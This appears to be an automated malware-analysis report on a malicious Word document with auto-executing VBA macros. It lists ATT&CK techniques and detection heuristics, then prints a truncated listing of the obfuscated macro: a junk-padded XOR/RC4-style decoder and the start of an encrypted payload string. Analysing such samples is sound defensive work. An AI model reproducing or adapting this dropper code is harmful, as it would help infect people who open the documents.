Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro triggers a 'Shell()' call, indicating an attempt to execute arbitrary commands. This is a common technique for downloading and executing further malicious content. The specific shell command and its target are not fully discernible due to obfuscation, but the intent is clear.
Heuristics (6)
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following were found in document text (OLE body):
  - http://ns.adobe.com/xap/1.0/
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://ns.adobe.com/photoshop/1.0/
  - http://www.iec.ch
  - http://schemas.openxmlformats.org/drawingml/2006/main
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29267 bytes | e06fdb4f1eb0fcd18f8099b5c2a7ebb4d21c6bfd03315a8006a56133a06e5473 |
Preview script (first 1,000 lines of the extracted script; the report shows the listing truncated):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function GiJ9I Lib "VZl2jXB0TfPLAVxLP" Alias "SFEPRxzli4Uv" (ByVal IMyu9xt7z As String, GaCs94wYX As Long) As Long
#Else
Private Declare Function GiJ9I lib "VZl2jXB0TfPLAVxLP" Alias "SFEPRxzli4Uv"(byval IMyu9xt7z as String, GaCs94wYX as Long ) as Long
#End If
Function PNpXLK8o(ByVal OHDdt0ekYTjz As String, PpDmw0bAgJzVlFuiP As String) As String
L9qkxD = 22
If L9qkxD + W5hXH > 1 Then
W5hXH = 98 + 17 + 62 + 52 '9 MIygzgzILi 12 74
End If
W5hXH = 14 + 24 '39 19 80 RHCopM67DyGfl1
On Error Resume Next
LTj5y5Of7I = 5
If LTj5y5Of7I + WLFsKgW4PbXeHMS > 1 Then
WLFsKgW4PbXeHMS = 51 + 85 + 9 + 85 '80 WfUx9l5MmyV 69 5
End If
WLFsKgW4PbXeHMS = 98 + 42 '11 32 43 MpZYDkIC18FWG3
Dim KeaRw2() As Byte, HcytMmAdkZet4a(0 To 285) As Integer, L8t3sl0mNQkb() As Byte, HmqWa09RDPe80h9m, FuEgEP6iBFa, VFdCR, U9V3LJlV, PhJsUyH0 As Boolean
HZfsw12CI0kAQ = 63
If HZfsw12CI0kAQ + K5aiEucUMyP > 1 Then
K5aiEucUMyP = 26 + 65 + 75 + 90 '70 Pc18aXjP 32 49
End If
K5aiEucUMyP = 50 + 47 '56 1 14 DNdLgU6ObBS
KeaRw2 = StrConv(OHDdt0ekYTjz, (64 + 8 + 64 - 8))
IpY4dW = 6
If IpY4dW + KBOshPs4PbxO > 1 Then
KBOshPs4PbxO = 51 + 15 + 71 + 2 '64 KM7BB2g36UpXg 76 14
End If
KBOshPs4PbxO = 29 + 9 '69 60 61 GpgmSf2
L8t3sl0mNQkb() = StrConv(PpDmw0bAgJzVlFuiP, (64 + 8 + 64 - 8))
SM0vm = 10
If SM0vm + B0baBxRHvcmPLW > 1 Then
B0baBxRHvcmPLW = 42 + 71 + 12 + 88 '7 NpdyekcBs9xeJZ 52 42
End If
B0baBxRHvcmPLW = 98 + 3 '65 4 14 SffM6Wm5ZfYKvsXwg
FuEgEP6iBFa = UBound(L8t3sl0mNQkb)
B1CsPVUA = 37
If B1CsPVUA + CJmry1afIFbs > 1 Then
CJmry1afIFbs = 92 + 52 + 22 + 13 '91 IlSYyPHTAJMD 31 12
End If
CJmry1afIFbs = 94 + 21 '41 8 7 Of3czD7TQ1XTP0
For HmqWa09RDPe80h9m = 0 To (127.5 + 5 + 127.5 - 5)
HcytMmAdkZet4a(HmqWa09RDPe80h9m) = HmqWa09RDPe80h9m
Next HmqWa09RDPe80h9m
For HmqWa09RDPe80h9m = (128 + 4 + 128 - 4) To (142.5 + 6 + 142.5 - 6)
HcytMmAdkZet4a(HmqWa09RDPe80h9m) = HmqWa09RDPe80h9m Xor (128 + 2 + 128 - 2)
Next HmqWa09RDPe80h9m
For HmqWa09RDPe80h9m = 1 To (3 + 4 + 3 - 4)
HcytMmAdkZet4a(HmqWa09RDPe80h9m + (124.5 + 4 + 124.5 - 4)) = L8t3sl0mNQkb(FuEgEP6iBFa - HmqWa09RDPe80h9m)
HcytMmAdkZet4a(HmqWa09RDPe80h9m - 1) = L8t3sl0mNQkb(HmqWa09RDPe80h9m - 1) Xor ((127.5 + 6 + 127.5 - 6) - L8t3sl0mNQkb(FuEgEP6iBFa - HmqWa09RDPe80h9m))
Next HmqWa09RDPe80h9m
PhJsUyH0 = False
VFdCR = 0
U9V3LJlV = 0
For HmqWa09RDPe80h9m = 0 To UBound(KeaRw2)
If VFdCR > FuEgEP6iBFa Then VFdCR = 0
If U9V3LJlV > (142.5 + 1 + 142.5 - 1) And PhJsUyH0 = False Then U9V3LJlV = 0: PhJsUyH0 = Not (PhJsUyH0)
If U9V3LJlV > (142.5 + 5 + 142.5 - 5) And PhJsUyH0 = True Then U9V3LJlV = (2.5 + 6 + 2.5 - 6): PhJsUyH0 = Not (PhJsUyH0)
KeaRw2(HmqWa09RDPe80h9m) = (KeaRw2(HmqWa09RDPe80h9m) Xor (HcytMmAdkZet4a(U9V3LJlV) Xor L8t3sl0mNQkb(VFdCR)))
VFdCR = VFdCR + 1
U9V3LJlV = U9V3LJlV + 1
Next HmqWa09RDPe80h9m
VKCfH = 12
If VKCfH + NFzTNHfQqt7 > 1 Then
NFzTNHfQqt7 = 48 + 64 + 44 + 5 '95 Uvu5l2VfFFK6Qgg6 96 93
End If
NFzTNHfQqt7 = 3 + 74 '87 1 33 PxYJ93
PNpXLK8o = StrConv(KeaRw2(), (32 + 1 + 32 - 1))
BRrWDsYgx53Uo = 42
If BRrWDsYgx53Uo + YJiQi1BNz4F9CjFkl > 1 Then
YJiQi1BNz4F9CjFkl = 83 + 85 + 4 + 23 '13 WjKLQ09cCW 69 36
End If
YJiQi1BNz4F9CjFkl = 74 + 13 '3 82 43 OIkav1oKp2TS
End Function
Sub WIZ464w8tTiV()
UvuxDqjzmDmwfr = 55
If UvuxDqjzmDmwfr + QO2DOKKPi > 1 Then
QO2DOKKPi = 59 + 54 + 63 + 89 '82 UklvxnCSfk 50 75
End If
QO2DOKKPi = 25 + 25 '77 93 18 VqxhLB55j7D
Dim VnF2N5wu As String, W6qkcS89p4DCCqfoh() As String, DyUhUqmNXYednCd6N As Integer
EcT3K9z = 74
If EcT3K9z + QZsf7SkfWiEjF46 > 1 Then
QZsf7SkfWiEjF46 = 34 + 3 + 94 + 72 '13 YbO1 93 76
End If
QZsf7SkfWiEjF46 = 3 + 23 '89 88 64 OhD9Zsi
VnF2N5wu = VnF2N5wu & "164,160,218,190,192,183,34,21,31,12,122,64,12,29,116,19,52,87,10,98,5,65,101,96,43,38,98,75,67,115,107,41,34, ... (truncated)
```